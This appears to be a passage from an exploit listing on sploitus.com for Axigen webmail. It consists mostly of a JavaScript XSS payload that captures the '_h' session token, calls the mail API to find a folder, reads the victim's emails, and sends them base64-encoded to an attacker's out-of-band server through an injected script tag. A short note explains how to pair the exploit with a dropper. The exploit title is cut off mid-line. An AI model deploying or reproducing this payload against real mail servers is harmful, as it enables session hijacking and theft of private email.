Share
## https://sploitus.com/exploit?id=A2F5FCAA-AD2F-55C3-89ED-82A2480B7469
# Exploit Title: Axigen  {
    if (xhr1.readyState === XMLHttpRequest.DONE) {
        _h_cookie = new URL(xhr1.responseURL).search.split("=")[1];
        xhr2.open('PATCH', `/api/v1/conversations/MQ/?_h=${_h_cookie}`,
true);
        xhr2.setRequestHeader('Content-Type', 'application/json');
        xhr2.onreadystatechange = () => {
            if (xhr2.readyState === XMLHttpRequest.DONE) {
                if (xhr2.status === 401){
                    script_tag.src =
`${oob_server}?status=session_expired&domain=${document.domain}`;
                    document.body.appendChild(script_tag);
                } else {
                    resp = xhr2.responseText;
                    folderId = JSON.parse(resp)["mails"][0]["folderId"];
                    xhr3.open('GET',
`/api/v1/conversations?folderId=${folderId}&_h=${_h_cookie}`, true);
                    xhr3.onreadystatechange = () => {
                        if (xhr3.readyState === XMLHttpRequest.DONE) {
                            emails = xhr3.responseText;
                            script_tag.src =
`${oob_server}?status=ok&domain=${document.domain}&emails=${btoa(emails)}`;
                            document.body.appendChild(script_tag);
                        }
                    };
                    xhr3.send();
                }
            }
        };
        var body = JSON.stringify({isUnread: false});
        xhr2.send(body);
    }
};
xhr1.send();
```

Combining dropper and exploit
You can host the exploit code somewhere and then address it in the dropper
code.


#### Published in: [exploit-db](https://www.exploit-db.com/search?e_author=amirzargham).
#### Published in: [0day.today](https://0day.today/author/46852).
#### Published in: [packet storm](https://packetstormsecurity.com/files/author/16843).